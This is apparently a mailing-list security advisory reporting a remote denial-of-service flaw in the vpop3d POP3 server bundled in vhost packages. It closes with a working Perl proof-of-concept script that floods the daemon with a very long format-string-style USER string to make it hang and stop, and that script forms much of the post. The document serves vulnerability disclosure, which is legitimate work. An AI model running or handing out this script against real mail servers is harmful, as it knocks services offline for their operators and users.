Topic: vpop3d Denial Of service Product: vpop3d Note: This is implemented in several vhost packages, I can't name all of them, but vhost-3.05r3 is one. Vendor Notification: Notified several Vendors about the binary vpop3d that they are using in their packages, Original Author of vpop3d has been mailed, haven't had anything back yet.. Background: /* * pop3d - IP/TCP/POP3 server for UNIX 4.3BSD * Post Office Protocol - Version 3 (RFC1225) * * (C) Copyright 1991 Regents of the University of California * */ modified by various vendors to fit their need, however I have seen this flaw in several vhost software packages. Problem Description: Seems that an attacker (remote or local) can cause a DOS on the vpop3d server, using a lengthy request.. This seems to cause the pop3 server to timeout then daemon drops...Note this was tested locally, with the binary.. Once we've hit it with our huge USER string it gives this mesg after 5mins or so then dies... "-ERR POP3 Server Abnormal Shutdown: Timeout waiting for command from client" Impact: DOS on the vpop3d daemon, means a manual restart of the daemon. Patch: Far too much to patch in this code!!! NOTE: Thanks to Jake Fan() For his input, and his help tracking the original author, and also for the fast reply..so thanks Jake Exploit: Nothing special.. ---------------------------------------------------------- #!/usr/bin/perl #vpop3d Denial Of Service.. #Proof of Concept script.. #Deadbeat, uk2sec.. #e: deadbeat@sdf.lonestar.org #e: daniels@legend.co.uk use IO::Socket; $host = $ARGV[0]; $port = $ARGV[1]; if(!$ARGV[1]){ die "usage: perl $0 \n"; } $dos = "%s%s"x5000; $req = "USER $dos"; $sox = IO::Socket::INET->new( Proto=>"tcp", PeerPort=>$port, PeerAddr=>$host )or die "can't connect to $host : $port\n"; sleep 2; print $sox $dos; sleep 1; print "done..vpop3d should lock now :)\n"; ------------------------------EOF------------------------- Regards, Deadbeat, uk2sec.. ------------------------------------- Deadbeat, e: deadbeat@sdf.lonestar.org e: daniels@legend.co.uk -------------------------------------